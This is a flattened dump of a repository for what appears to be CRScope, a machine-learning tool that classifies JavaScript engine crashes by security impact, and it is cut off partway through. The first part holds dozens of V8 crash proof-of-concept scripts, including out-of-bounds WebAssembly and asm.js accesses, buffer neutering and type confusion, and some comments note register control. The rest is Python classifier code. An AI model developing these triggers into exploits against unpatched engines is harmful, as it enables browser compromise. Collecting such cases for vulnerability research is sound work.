CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 22 | // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 23 | // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 25 | // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 26 | // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | // Flags: --allow-natives-syntax 29 | 30 | function f(o) { 31 | for (var i = 1; i < 2; ++i) { 32 | var y = o.y; 33 | } 34 | } 35 | f({y:1.1}); 36 | f({y:1.1}); 37 | 38 | function g(x) { f({z:x}); } 39 | g(1); 40 | g(2); 41 | %OptimizeFunctionOnNextCall(g); 42 | g(1); 43 | -------------------------------------------------------------------------------- /js_tests/V8/security/9c66ed7afc9e82d2f41a5e7c0c9add59.js: -------------------------------------------------------------------------------- 1 | var hugetempl = {length: 0x24924925}; 2 | var huge = new Float64Array(hugetempl); 3 | -------------------------------------------------------------------------------- /js_tests/V8/security/9fad2ed6552f56c5a1828879d043c657.js: -------------------------------------------------------------------------------- 1 | this.__defineGetter__("x", (a = (function f() { return; (function() {}); })()) => { }); 2 | x; 3 | -------------------------------------------------------------------------------- /js_tests/V8/security/a098aed0dd6fdee300164c76c0dd085f.js: -------------------------------------------------------------------------------- 1 | ({ 2 | m() { 3 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 4 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 5 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 6 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 7 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 8 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 9 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 10 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 11 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 12 | x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 13 | // Reference 201: 14 | x; 15 | } 16 | }) 17 | 18 | -------------------------------------------------------------------------------- /js_tests/V8/security/a4e07de3081d24933070cec32e06f754.js: -------------------------------------------------------------------------------- 1 | function gc() { 2 | for (let i = 0; i < 20; i++) 3 | new ArrayBuffer(0x2000000); 4 | } 5 | 6 | 7 | class Derived extends Array { 8 | constructor(a) { 9 | const a = 1; 10 | } 11 | } 12 | 13 | // Derived is not a subclass of RegExp 14 | let o = Reflect.construct(RegExp, [], Derived); 15 | o.lastIndex = 0x1234; 16 | 17 | gc(); 18 | -------------------------------------------------------------------------------- /js_tests/V8/security/ac45c4f18c69251de154d104a91ece11.js: -------------------------------------------------------------------------------- 1 | var string_len = 0x0ffffff0 - 19; 2 | 3 | print("Allocating backing store"); 4 | var backing = new ArrayBuffer(string_len + 19); 5 | 6 | print("Allocating typed array buffer"); 7 | var buffer = new Uint8Array(backing); 8 | 9 | print("Filling..."); 10 | buffer.fill(0x41); 11 | 12 | print("Setting up array buffer"); 13 | // Magic 14 | buffer.set([0x00, 0x61, 0x73, 0x6D], 0); 15 | // Version 16 | buffer.set([0x01, 0x00, 0x00, 0x00], 4); 17 | // kUnknownSection (0) 18 | buffer.set([0], 8); 19 | // Section length 20 | buffer.set([0x80, 0x80, 0x80, 0x80, 0x00], 9); 21 | // Name length 22 | buffer.set([0xDE, 0xFF, 0xFF, 0x7F], 14); 23 | 24 | print("Parsing module..."); 25 | var m = new WebAssembly.Module(buffer); 26 | 27 | print("Triggering!"); 28 | var c = WebAssembly.Module.customSections(m, "A".repeat(string_len + 1)); 29 | -------------------------------------------------------------------------------- /js_tests/V8/security/b482f07acac8211350984ed2df1375aa.js: -------------------------------------------------------------------------------- 1 | // flags: --allow-natives-syntax 2 | var buf = new ArrayBuffer(0x10000); 3 | var arr2 = new Uint8Array(buf).fill(55); 4 | var tmp = {}; 5 | tmp[Symbol.toPrimitive] = function () { 6 | %ArrayBufferNeuter(arr2.buffer) 7 | var arr3 = new Uint8Array(0x800).fill(0xfc); 8 | return 0; 9 | }; 10 | 11 | print(Array.prototype.indexOf.call(arr2, 0x00, tmp)); 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/b6ce03dea55d10cb4a2d31d801e44da2.js: -------------------------------------------------------------------------------- 1 | function module(stdlib,foreign,buffer) { 2 | "use asm"; 3 | var fl = new stdlib.Uint32Array(buffer); 4 | function f1(x) { 5 | x = x | 0; 6 | fl[0] = x; 7 | fl[0x10000] = x; 8 | fl[0x100000] = x; 9 | } 10 | return f1; 11 | } 12 | 13 | var global = {Uint32Array:Uint32Array}; 14 | var env = {}; 15 | memory = new WebAssembly.Memory({initial:200}); 16 | var buffer = memory.buffer; 17 | evil_f = module(global,env,buffer); 18 | 19 | zz = {}; 20 | zz.toString = function() { 21 | Array.prototype.slice.call([]); 22 | return 0xffffffff; 23 | } 24 | evil_f(3); 25 | memory.grow(1); 26 | evil_f(zz); 27 | -------------------------------------------------------------------------------- /js_tests/V8/security/c6b9618f73f0ce26d6d8d3f8cbc04afa.js: -------------------------------------------------------------------------------- 1 | f = function f() {}; 2 | var x = 0x23; 3 | try { 4 | function t(d) { 5 | return [ 0, t(d) ]; 6 | } 7 | (multiline)([0,[0,[]]], t(2)); 8 | } catch(exc1) {} 9 | Boolean.prototype.ObjectValueOf = Object.prototype.valueOf; 10 | var str = "foo"; 11 | var arr = [""]; 12 | for (var i = 0; i < str.length; f.__defineGetter__('0', function() {})) { 13 | arr.push('object', typeof false.ObjectValueOf()); 14 | } 15 | -------------------------------------------------------------------------------- /js_tests/V8/security/c9b010c6898bea44a775f2fddb064cef.js: -------------------------------------------------------------------------------- 1 | function f(x, y) { 2 | if (x == 149999) { 3 | x+''; 4 | gc(); 5 | } 6 | } 7 | for (var i = 0; i < 150000; i++) { 8 | new f(i); 9 | } 10 | -------------------------------------------------------------------------------- /js_tests/V8/security/c9fa07f8f7e631a35fc1985fbaeed40c.js: -------------------------------------------------------------------------------- 1 | function f(a,i) { 2 | return a[i]; 3 | } 4 | f([1,2,3], "length"); 5 | f(3); 6 | f([1,2,3], 3); 7 | f(34359738368, 131072); 8 | 9 | -------------------------------------------------------------------------------- /js_tests/V8/security/cc35c6bdb4a8d5d5b704735c3556d2f4.js: -------------------------------------------------------------------------------- 1 | (function () { 2 | function classOf(object) { typeof(value); }; 3 | })(); 4 | function F() {} 5 | Object.prototype.__defineSetter__('x', function(value) { result_x = value; }); 6 | this.__proto__ = { x: 42 }; 7 | try { 8 | fail; 9 | } catch (e) { 10 | eval('const x = 7'); 11 | } 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/d05d03c2b19ed1acd27ba8b004092542.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | function f(a, b, a) { 3 | return Array.prototype.slice.call(arguments); 4 | } 5 | let result = f(456, 789, 111112); 6 | assertEquals(result[0], 456); 7 | assertEquals(result[1], 789); 8 | assertEquals(result[2], 111112); 9 | assertEquals(result.length, 3); 10 | })(); 11 | (function() { 12 | function f(a, b, a) { 13 | return Array.prototype.slice.call(arguments); 14 | } 15 | let result = f(456, 789, 111112, 543, 654); 16 | assertEquals(result[0], 456); 17 | assertEquals(result[1], 789); 18 | assertEquals(result[2], 111112); 19 | assertEquals(result[3], 543); 20 | assertEquals(result[4], 654); 21 | assertEquals(result.length, 5); 22 | })(); 23 | -------------------------------------------------------------------------------- /js_tests/V8/security/d1ecfec41f5238812d24c2516949a515.js: -------------------------------------------------------------------------------- 1 | var str = "ABX X"; 2 | str = str.replace(/(\w)?X/g, function(match, capture) {}); 3 | function test() { 4 | try { 5 | test(7, 'right'); 6 | } catch(e) { 7 | "bar.foo baz......".replace(/(ba.).*?f/g, function() { return "x";}); 8 | } 9 | } 10 | test(); 11 | -------------------------------------------------------------------------------- /js_tests/V8/security/d26333736f9b167881c163a9134a99d4.js: -------------------------------------------------------------------------------- 1 | function getHiddenValue(){ 2 | var obj = {}; 3 | var oob = "/re/"; 4 | //oob = oob.replace("re","*".repeat(0x2000)); 5 | oob = oob.replace("re","*".repeat(0x100000)); 6 | var str = 'class x extends Array{'+oob+"}"; 7 | var fun = eval(str); 8 | Object.assign(obj,fun); 9 | return obj; 10 | } 11 | function makeOobString(){ 12 | var hiddenValue = getHiddenValue(); 13 | var str = 'class x extends Array{}'; 14 | var fun = eval(str); 15 | Object.assign(fun,hiddenValue); 16 | var oobString = fun.toString(); 17 | return oobString; 18 | } 19 | var oobString = makeOobString(); 20 | -------------------------------------------------------------------------------- /js_tests/V8/security/e122c759ac220fe3f887c4565b8a578f.js: -------------------------------------------------------------------------------- 1 | function makeConstructor() { 2 | return function() { 3 | this.a = 1; 4 | this.b = 2; 5 | }; 6 | } 7 | 8 | var c1 = makeConstructor(); 9 | var o1 = new c1(); 10 | 11 | c1.prototype = {}; 12 | 13 | for (var i = 0; i < 10; i++) { 14 | var o = new c1(); 15 | for (var j = 0; j < 8; j++) { 16 | o["x" + j] = 0; 17 | } 18 | } 19 | 20 | var c2 = makeConstructor(); 21 | var o2 = new c2(); 22 | 23 | for (var i = 0; i < 50000; i++) { 24 | new c2(); 25 | } 26 | -------------------------------------------------------------------------------- /js_tests/V8/security/e1896d3d27323954b6d893c876117f13.js: -------------------------------------------------------------------------------- 1 | let PERSIAN_EPOCH = 1948320; 2 | function compute(julianDay){ 3 | let daysSinceEpoch = julianDay - PERSIAN_EPOCH 4 | //print daysSinceEpoch 5 | let t = 33*daysSinceEpoch+3; 6 | //print(t); 7 | let year = 1 + Math.floor((t%-0x100000000)/12053); 8 | //print(year); 9 | let farvardin1 = 365 * (year - 1) + Math.floor((8 * year + 21)/33); 10 | //print(farvardin1); 11 | let dayOfYear = (daysSinceEpoch - farvardin1); 12 | return dayOfYear-1; 13 | } 14 | 15 | function getday(d){ 16 | for(var a of d){ 17 | if(a.type === 'day') 18 | return a.value; 19 | } 20 | } 21 | 22 | function toHex(d){ 23 | s = d.toString(16); 24 | return '0'.repeat(4-s.length)+s; 25 | } 26 | 27 | var dateti1 = new Intl.DateTimeFormat("bs-Cyrl-u-ca-persian"); 28 | date2 = null; 29 | for(var i=0; i<50; i++){ 30 | let julianDay = 128202205+i*31; 31 | let dayOfYear = compute(-julianDay); 32 | //print(dayOfYear); 33 | Date.prototype["valueOf"] = function(){return -28800000-(2440588+julianDay)*86400000;}; 34 | var d = dateti1.formatToParts(date2); 35 | dayOfMonth = getday(d); 36 | result = (dayOfYear + 1 - dayOfMonth)&0xffff; 37 | print(toHex(result)); 38 | } 39 | -------------------------------------------------------------------------------- /js_tests/V8/security/e3a1bc101eb25a1d57e039ccdff0fc17.js: -------------------------------------------------------------------------------- 1 | const f = eval(`(function f(i) { 2 | if (i == 0) { 3 | class Derived extends Object { 4 | constructor() { 5 | super(); 6 | ${"this.a=1;".repeat(0x3fffe-8)} 7 | } 8 | } 9 | 10 | return Derived; 11 | } 12 | 13 | class DerivedN extends f(i-1) { 14 | constructor() { 15 | super(); 16 | ${"this.a=1;".repeat(0x40000-8)} 17 | } 18 | } 19 | 20 | return DerivedN; 21 | })`); 22 | 23 | let a = new (f(0x7ff))(); 24 | console.log(a); 25 | -------------------------------------------------------------------------------- /js_tests/V8/security/e3cef65942c177b74841132cd20f0b76.js: -------------------------------------------------------------------------------- 1 | // Flags: --ignition 2 | 3 | function function_with_n_params_and_m_args(n, m) { 4 | test_prefix = 'prefix '; 5 | test_suffix = ' suffix'; 6 | var source = 'test_prefix + (function f('; 7 | for (var arg = 0; arg < n ; arg++) { 8 | if (arg != 0) source += ','; 9 | source += 'arg' + arg; 10 | } 11 | source += ') { return arg' + (n - n % 2) / 2 + '; })('; 12 | for (var arg = 0; arg < m ; arg++) { 13 | if (arg != 0) source += ','; 14 | source += arg; 15 | } 16 | source += ') + test_suffix'; 17 | return eval(source); 18 | } 19 | 20 | function_with_n_params_and_m_args(-0x8001, 0x7FFF); 21 | -------------------------------------------------------------------------------- /js_tests/V8/security/e82fc45e9057c89ce8d67ca38a7e4227.js: -------------------------------------------------------------------------------- 1 | boom=(function(stdlib,foreign,heap){ 2 | "use asm"; 3 | var Uint8ArrayView=new stdlib.Uint8Array(heap); 4 | var Int32ArrayView=new stdlib.Int32Array(heap); 5 | function f(i,i1){ 6 | i1=Uint8ArrayView[256]; 7 | // This following value '10' determines the value of 'rax' 8 | Int32ArrayView[i1>>10] = 0xabcdefaa; 9 | return(-i1+((Int32ArrayView[((i1))>>2])))} 10 | return f 11 | })(this,0, new ArrayBuffer(256)); 12 | 13 | for (var i = 0; i < 400; ++i) { // Trigger optimization 14 | boom(0, 0x1000); 15 | } 16 | -------------------------------------------------------------------------------- /js_tests/V8/security/eb0fada39a4d0ce7e30b22b94884b993.js: -------------------------------------------------------------------------------- 1 | function Ctor() { 2 | n = new Set(); 3 | } 4 | function Check() { 5 | n.xyz = 0x826852f4; 6 | parseInt(); 7 | } 8 | for(var i=0; i<2000; ++i) { 9 | Ctor(); 10 | } 11 | for(var i=0; i<2000; ++i) { 12 | Check(); 13 | } 14 | Ctor(); 15 | Check(); 16 | -------------------------------------------------------------------------------- /js_tests/V8/security/eeab1d87a61ef30ea60b168773762d2c.js: -------------------------------------------------------------------------------- 1 | this.__defineSetter__("x", function(){}); 2 | function go (y = (function rec(a1, a2) { 3 | // The position of "AAAA" controls a register value. 4 | if (a1.length == a2) { b = "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAA"; } 5 | rec(a1, a2 + 1); 6 | })([,], 0) 7 | , b = eval("") 8 | ) 9 | {} 10 | go(x); 11 | -------------------------------------------------------------------------------- /js_tests/V8/security/f28112595043066a56f8de4cf1c6d125.js: -------------------------------------------------------------------------------- 1 | var string = "What are you looking for?"; 2 | 3 | var expected_match = [""]; 4 | for (var i = 0; i < string.length; i++) { 5 | expected_match.push(""); 6 | } 7 | 8 | string.replace(/(_)|(_|)/g, ""); 9 | //assertArrayEquals(expected_match, string.match(/(_)|(_|)/g, "")); 10 | 11 | '***************************************'.match(/((\\)|(\*)|(\$))/g, "."); 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/f60803ceaaf37ad832856d0c05036085.js: -------------------------------------------------------------------------------- 1 | arr=[]; 2 | for (var i = 0; i < 100000; i++) 3 | arr[i] = []; 4 | arr.indexOf(new Object(), {valueOf:function(){arr.length = 0}}) 5 | -------------------------------------------------------------------------------- /paper.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/CRScope/605ef835624eac213af625b1cf65abccc5703ce6/paper.pdf -------------------------------------------------------------------------------- /src/arg.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | def create_parser(): 4 | parser = argparse.ArgumentParser() 5 | parser.add_argument('datafile', type=argparse.FileType('r'), help='input data file') 6 | parser.add_argument('-e', '--engine', choices=['chakra', 'v8', 'spider', 'chakra_v8', 'chakra_spider', 'v8_spider', 'all']) 7 | parser.add_argument('-s', '--sampling', choices=['under', 'over'], default='over') 8 | parser.add_argument('-o', '--option', type=int, default=1) 9 | parser.add_argument('-c', '--choice', choices=['crscope', 'exniffer', 'combi']) 10 | parser.add_argument('-v', '--version') 11 | return parser 12 | 13 | def parse(args): 14 | parser = create_parser() 15 | return parser.parse_args(args) 16 | 17 | -------------------------------------------------------------------------------- /src/case.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib 3 | matplotlib.use('Agg') 4 | import matplotlib.pyplot as plt 5 | from sklearn.metrics import auc 6 | 7 | class Case: 8 | def __init__(self, *args): 9 | if len(args) == 1: 10 | self.name = args[0] 11 | self.figname = args[0] 12 | self.flag_preprocess = None 13 | self.flag_tfidvector = None 14 | self.flag_countvector = None 15 | else: 16 | preprocess = args[0] 17 | tfid = args[1] 18 | count = args[2] 19 | 20 | self.name = "" 21 | if preprocess == True: 22 | self.flag_preprocess = True 23 | self.name += "preprocess O\n" 24 | else: 25 | self.flag_preprocess = False 26 | self.name += "preprocess X\n" 27 | 28 | self.name += "string feature: " 29 | if tfid == True: 30 | self.flag_tfidvector = True 31 | self.name += "\nTfidfVectorizer" 32 | else: 33 | self.flag_tfidvector = False 34 | 35 | if count == True: 36 | self.flag_countvector = True 37 | self.name += "\nCountVectorizer" 38 | else: 39 | self.flag_countvector = False 40 | 41 | self.figname = "%s-%s-%s" %(preprocess, tfid, count) 42 | 43 | self.accuracy_list = {} 44 | self.aucs_list = {} 45 | self.tprs_list = {} 46 | 47 | def get_name(self): 48 | return self.name 49 | 50 | def get_figname(self): 51 | return self.figname 52 | 53 | def get_flag_preprocess(self): 54 | return self.flag_preprocess 55 | 56 | def get_flag_tfidvector(self): 57 | return self.flag_tfidvector 58 | 59 | def get_flag_countvector(self): 60 | return self.flag_countvector 61 | 62 | def init_array(self, model_list): 63 | for model in model_list: 64 | self.accuracy_list[model] = 0 65 | self.aucs_list[model] = 0 66 | self.tprs_list[model] = 0 67 | 68 | def add_accuracy(self, model, accuracy): 69 | self.accuracy_list[model] = accuracy 70 | 71 | def add_aucs(self, model, aucs): 72 | self.aucs_list[model] = aucs 73 | 74 | def add_tprs(self, model, tprs): 75 | self.tprs_list[model] = tprs 76 | 77 | def draw(self, path): 78 | self._draw_accuracy_graph(path) 79 | self._draw_auc_graph(path) 80 | 81 | def _draw_accuracy_graph(self, path): 82 | fig = plt.gcf() 83 | for i, accuracy in enumerate(self.accuracy_list.values()): 84 | plt.plot([i+1]*len(accuracy), accuracy, ".") 85 | plt.boxplot(self.accuracy_list.values(), labels=self.accuracy_list.keys()) 86 | fig.savefig(path+'accuracy-%s.png' %self.figname) 87 | plt.close() 88 | 89 | def _draw_auc_graph(self, path): 90 | color_list = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] 91 | mean_fpr = np.linspace(0, 1, 101) 92 | 93 | for i, (label, tprs, aucs) in enumerate(zip(self.tprs_list.keys(), self.tprs_list.values(), self.aucs_list.values())): 94 | mean_tpr = np.mean(tprs, axis=0) 95 | mean_tpr[-1] = 1.0 96 | mean_auc = auc(mean_fpr, mean_tpr) 97 | std_auc = np.std(aucs) 98 | plt.plot(mean_fpr, mean_tpr, color=color_list[i], label=r'%s Mean ROC (AUC = %0.2f $\pm$ %0.2f)' % (label, mean_auc, std_auc), lw=2, alpha=.8) 99 | 100 | plt.xlim([-0.05, 1.05]) 101 | plt.ylim([-0.05, 1.05]) 102 | plt.xlabel('False Positive Rate') 103 | plt.ylabel('True Positive Rate') 104 | plt.legend(loc="lower right", fontsize=10) 105 | 106 | fig = plt.gcf() 107 | fig.savefig(path+'auc-%s.png' %self.figname) 108 | plt.close() 109 | 110 | def print_debug(self): 111 | print self.name 112 | print self.figname 113 | print self.flag_preprocess 114 | print self.flag_tfidvector 115 | print self.flag_countvector 116 | print self.accuracy_list 117 | print self.aucs_list 118 | print self.tprs_list 119 | -------------------------------------------------------------------------------- /src/data.py: -------------------------------------------------------------------------------- 1 | import log 2 | import pandas as pd 3 | 4 | class Dataset: 5 | def __init__(self, logger, data): 6 | # for debug 7 | pd.set_option('display.max_columns', None) 8 | pd.set_option('display.max_rows', None) 9 | 10 | self.logger = logger 11 | 12 | # load data 13 | if type(data) == str: 14 | self.filename = data 15 | self.df = self._read_file() 16 | else: 17 | self.df = data 18 | 19 | def _read_file(self): 20 | self.logger.log("debug", "Read data from %s" %self.filename) 21 | return pd.read_csv(self.filename) 22 | 23 | def _get_null_data_list(self): 24 | return self.df.isnull().sum().to_string().splitlines() 25 | 26 | def _get_null_data(self, col): 27 | return self.df[self.df[col].isnull()].to_string().splitlines()[1:] 28 | 29 | def get_size(self): 30 | return list(self.df.shape) 31 | 32 | def drop_na(self, fields): 33 | old_size = self.get_size() 34 | if type(fields) is list: 35 | self.df = self.df.dropna(subset=fields) 36 | elif type(fields) is str: 37 | self.df = self.df.dropna(subset=[fields]) 38 | new_size = self.get_size() 39 | self.logger.log("debug", "Data size: %s -> %s" %(old_size, new_size)) 40 | self.df = self.df.fillna('') 41 | 42 | def analyze_null(self, columns): 43 | msg = "Analyze null data\n" 44 | msg += "[*] Null data:\n" 45 | null_data = self._get_null_data_list() 46 | for line in null_data: 47 | msg += (" %s\n" %line) 48 | line = line.split() 49 | if line[0] in columns and int(line[1]) != 0: 50 | data_list = self._get_null_data(line[0]) 51 | for data in data_list: 52 | msg += (" => %s\n" %data) 53 | self.logger.log("info", msg) 54 | 55 | def count(self): 56 | security_id = dict(self.df[['security', 'security_id']].drop_duplicates().values) 57 | count = self.df.security.value_counts() 58 | msg = "Data ratio:\n" 59 | msg += "\t=> security(%s) : %s\n" %(security_id['security'], count['security']) 60 | msg += "\t=> No-security(%s): %s\n" %(security_id['No-security'], count['No-security']) 61 | msg += "\t----------------- : %d" %(len(self.df)) 62 | self.logger.log("info", msg) 63 | return {'security(%d)'%(security_id['security']):count['security'], 64 | 'No-security(%d)'%(security_id['No-security']):count['No-security'], 65 | 'total':len(self.df)} 66 | 67 | def factorize_label(self): 68 | self.df['security_id'] = self.df['security'].factorize()[0] 69 | 70 | def sort_date(self): 71 | self.df['date'] = pd.to_datetime(self.df.date) 72 | self.df = self.df.sort_values(by='date') 73 | -------------------------------------------------------------------------------- /src/log.py: -------------------------------------------------------------------------------- 1 | import os 2 | import logging 3 | 4 | LOGGING_LEVELS = {'critical': logging.CRITICAL, 5 | 'error': logging.ERROR, 6 | 'warning': logging.WARNING, 7 | 'info': logging.INFO, 8 | 'debug': logging.DEBUG} 9 | 10 | class Logger: 11 | def __init__(self, name): 12 | self.logger = logging.getLogger() 13 | self.formatter = logging.Formatter('[%(levelname)s] %(message)s') 14 | 15 | # create handler 16 | fileHandler = logging.FileHandler('%s/%s.log' %(self._set_dir(), name)) 17 | # streamHandler = logging.StreamHandler() 18 | # set format 19 | fileHandler.setFormatter(self.formatter) 20 | # streamHandler.setFormatter(self.formatter) 21 | 22 | # add handler 23 | self.logger.addHandler(fileHandler) 24 | # self.logger.addHandler(streamHandler) 25 | 26 | self.logger.setLevel(logging.DEBUG) 27 | 28 | def _set_dir(self): 29 | root = os.path.dirname(os.path.realpath(__file__)) 30 | log_dir = '%s/../log' %root 31 | if os.path.isdir(log_dir) == False: 32 | os.system('mkdir -p %s' %log_dir) 33 | return log_dir 34 | 35 | def set_logging_level(self, level): 36 | self.logger.setLevel(LOGGING_LEVELS.get(level, logging.NOTSET)) 37 | 38 | def log_critical(self, msg): 39 | self.logger.critical(msg) 40 | 41 | def log_error(self, msg): 42 | self.logger.error(msg) 43 | 44 | def log_warning(self, msg): 45 | self.logger.error(msg) 46 | 47 | def log_info(self, msg): 48 | self.logger.info(msg) 49 | 50 | def log_debug(self, msg): 51 | self.logger.debug(msg) 52 | 53 | def log(self, level, msg): 54 | self.logger.log(LOGGING_LEVELS.get(level, logging.NOTSET), msg) 55 | -------------------------------------------------------------------------------- /src/model/__init__.py: -------------------------------------------------------------------------------- 1 | from logistic_regression import MyLogisticRegression 2 | from random_forest_classifier import MyRandomForestClassifier 3 | from multinomial_nb import MyMultinomialNB 4 | from decision_tree_classifier import MyDecisionTreeClassifier 5 | from linear_svc import MyLinearSVC 6 | from mlp_classifier import MyMLPClassifier 7 | 8 | __all__ = [ 9 | 'MyLogisticRegression', 10 | 'MyRandomForestClassifier', 11 | 'MyMultinomialNB', 12 | 'MyDecisionTreeClassifier', 13 | 'MyLinearSVC', 14 | 'MyMLPClassifier'] 15 | -------------------------------------------------------------------------------- /src/model/decision_tree_classifier.py: -------------------------------------------------------------------------------- 1 | import os 2 | import log 3 | import numpy as np 4 | from model import Model 5 | from sklearn.tree import DecisionTreeClassifier 6 | from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_curve, auc 7 | 8 | from joblib import dump, load 9 | 10 | class MyDecisionTreeClassifier(Model): 11 | def __init__(self): 12 | self.name = type(self).__name__[2:] 13 | self.model = DecisionTreeClassifier(random_state=0) 14 | 15 | def grid_search(self, X, y, n): 16 | criterion = ['gini', 'entropy'] 17 | splitter = ['best', 'random'] 18 | max_features = ['auto', 'sqrt', 'log2', None] 19 | max_depth = [None, 2, 5, 10, 20, 50, 100, 500, 1000] 20 | 21 | parameters = [ 22 | dict(criterion=criterion, splitter=splitter, max_features=max_features, max_depth=max_depth) 23 | ] 24 | 25 | self.run_grid_search(parameters, X, y, n) 26 | 27 | def learn(self, logger, set_list, names_list, n, engine): 28 | super(MyDecisionTreeClassifier, self).__init__(logger) 29 | 30 | for i, [[X_train, X_test, y_train, y_test], names] in enumerate(zip(set_list, names_list)): 31 | dump_file = './dump/%s/%s_%s' %(engine, self.name, i) 32 | if os.path.isfile(dump_file): 33 | self.model = load(dump_file) 34 | else: 35 | self.logger.log("debug", "cv(%d)" %i) 36 | self.grid_search(X_train, y_train, n) 37 | dump(self.model, dump_file) 38 | 39 | y_pred = self.model.predict(X_test) 40 | 41 | importances = self.model.feature_importances_ 42 | self.coef.append(self.get_coef_rank(importances, names)) 43 | 44 | self.accuracy_score.append(accuracy_score(y_test, y_pred)) 45 | self.confusion_matrix.append(confusion_matrix(y_test, y_pred)) 46 | self.report.append(classification_report(y_test, y_pred).replace('\n\n', '\n')) 47 | 48 | fpr, tpr, thresholds = roc_curve(y_test, y_pred) 49 | roc_auc = auc(fpr, tpr) 50 | self.roc_auc_score.append(roc_auc) 51 | self.add_tprs(fpr, tpr) 52 | -------------------------------------------------------------------------------- /src/model/linear_svc.py: -------------------------------------------------------------------------------- 1 | import os 2 | import log 3 | import numpy as np 4 | from model import Model 5 | from sklearn.svm import LinearSVC 6 | from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_curve, auc 7 | 8 | from joblib import dump, load 9 | 10 | class MyLinearSVC(Model): 11 | def __init__(self): 12 | self.name = type(self).__name__[2:] 13 | self.model = LinearSVC() 14 | 15 | def grid_search(self, X, y, n): 16 | penalty = ['l1', 'l2'] 17 | loss = ['hinge', 'squared_hinge'] 18 | dual = [False, True] 19 | tol = [1e-4, 1e-6, 1e-8, 1e-10, 1e-20] 20 | C = [1e+0, 1e+1, 1e+2, 1e+3, 1e+4] 21 | max_iter = [1e+2, 1e+3, 1e+4, 1e+5] 22 | multi_class = ['ovr', 'crammer_singer'] 23 | 24 | parameters = [ 25 | dict(penalty=[penalty[0]], loss=[loss[1]], dual=[dual[0]], tol=tol, C=C, max_iter=max_iter, multi_class=multi_class), 26 | dict(penalty=[penalty[1]], loss=[loss[0]], dual=[dual[1]], tol=tol, C=C, max_iter=max_iter, multi_class=multi_class), 27 | dict(penalty=[penalty[1]], loss=[loss[1]], dual=dual, tol=tol, C=C, max_iter=max_iter, multi_class=multi_class) 28 | ] 29 | 30 | self.run_grid_search(parameters, X, y, n) 31 | 32 | def learn(self, logger, set_list, names_list, n, engine): 33 | super(MyLinearSVC, self).__init__(logger) 34 | 35 | for i, [[X_train, X_test, y_train, y_test], names] in enumerate(zip(set_list, names_list)): 36 | dump_file = './dump/%s/%s_%s' %(engine, self.name, i) 37 | if os.path.isfile(dump_file): 38 | self.model = load(dump_file) 39 | else: 40 | self.logger.log("debug", "cv(%d)" %i) 41 | self.grid_search(X_train, y_train, n) 42 | dump(self.model, dump_file) 43 | 44 | y_pred = self.model.predict(X_test) 45 | 46 | importances = self.model.coef_[0] 47 | self.coef.append(self.get_coef_rank(importances, names)) 48 | self.accuracy_score.append(accuracy_score(y_test, y_pred)) 49 | self.confusion_matrix.append(confusion_matrix(y_test, y_pred)) 50 | self.report.append(classification_report(y_test, y_pred).replace('\n\n', '\n')) 51 | 52 | fpr, tpr, thresholds = roc_curve(y_test, y_pred) 53 | roc_auc = auc(fpr, tpr) 54 | self.roc_auc_score.append(roc_auc) 55 | self.add_tprs(fpr, tpr) 56 | -------------------------------------------------------------------------------- /src/model/logistic_regression.py: -------------------------------------------------------------------------------- 1 | import os 2 | import log 3 | import numpy as np 4 | from model import Model 5 | from sklearn.linear_model import LogisticRegression 6 | from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_curve, auc 7 | 8 | from joblib import dump, load 9 | 10 | class MyLogisticRegression(Model): 11 | def __init__(self): 12 | self.name = type(self).__name__[2:] 13 | self.model = LogisticRegression() 14 | 15 | def grid_search(self, X, y, n): 16 | penalty = ['l1', 'l2'] 17 | dual = [False, True] 18 | tol = [1e-4, 1e-6, 1e-8, 1e-10] 19 | C = [1e+0, 1e+1, 1e+2, 1e+3] 20 | solver = ['liblinear', 'newton-cg', 'lbfgs', 'sag'] 21 | max_iter = [1e+2, 1e+3, 1e+4, 1e+5] 22 | warm_start = [False, True] 23 | 24 | parameters = [ 25 | # liblinear 26 | dict(solver=[solver[0]], penalty=[penalty[0]], tol=tol, C=C, dual=[dual[0]], warm_start=[warm_start[0]]), 27 | dict(solver=[solver[0]], penalty=[penalty[1]], tol=tol, C=C, dual=dual, warm_start=[warm_start[0]]), 28 | 29 | # newton-cg, lbfgs, sag 30 | dict(solver=solver[1:], penalty=[penalty[1]], tol=tol, C=C, dual=[dual[0]], warm_start=warm_start, max_iter=max_iter), 31 | ] 32 | 33 | self.run_grid_search(parameters, X, y, n) 34 | 35 | def learn(self, logger, set_list, names_list, n, engine): 36 | super(MyLogisticRegression, self).__init__(logger) 37 | 38 | for i, [[X_train, X_test, y_train, y_test], names] in enumerate(zip(set_list, names_list)): 39 | dump_file = './dump/%s/%s_%s' %(engine, self.name, i) 40 | if 